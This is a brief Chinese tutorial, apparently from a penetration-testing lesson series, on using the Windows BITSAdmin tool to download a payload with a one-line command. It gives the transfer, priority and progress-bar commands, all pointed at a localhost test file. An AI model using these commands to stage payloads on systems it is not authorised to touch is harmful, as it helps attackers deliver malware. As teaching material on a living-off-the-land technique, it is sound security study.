BITSAdmin一句话下载payload
/0x00 前言
参考Micro8系列第四十一课:https://micro8.gitbook.io/micro8/contents-1/41-50/41bitsadmin-yi-ju-hua-xia-zai-payload
0x01 BITSAdmin一句话下载payload
BITSAdmin是一个命令行工具,可用于创建下载或上传并监视其进度。
更多资料可参考微软官方文档:https://docs.microsoft.com/zh-cn/windows/win32/bits/bitsadmin-tool
自Windows 7以上版本内置了BITSAdmin,它可以在网络不稳定的状态下下载文件,出错会自动重试,在比较复杂的网络环境下有着不错的性能。
一句话下载payload:
1 | bitsadmin /rawreturn /transfer down "http://127.0.0.1/test.txt" D:\test.txt |
- /rawreturn参数:返回适合解析的数据;
- /transfer参数:传输一个或多个文件。其中紧接的第一个参数值down是本次传输任务的名称,第二个参数值是远程需要传输的文件,第三个参数是传输到的本地目标文件;
如果需要下载过大的文件,需要提高优先级。配合上面的下载命令,再次执行:
1 | bitsadmin /setpriority down foreground |
- /setpriority参数:设置特定任务的优先级;
如果下载文件在1-5M之间,需要实时查看进度,可以使用进度条:
1 | bitsadmin /transfer down /download /priority normal "http://127.0.0.1/test.txt" D:\test.txt |
注意:BITSAdmin需要服务器支持Range头,并且BITSAdmin不支持HTTPS。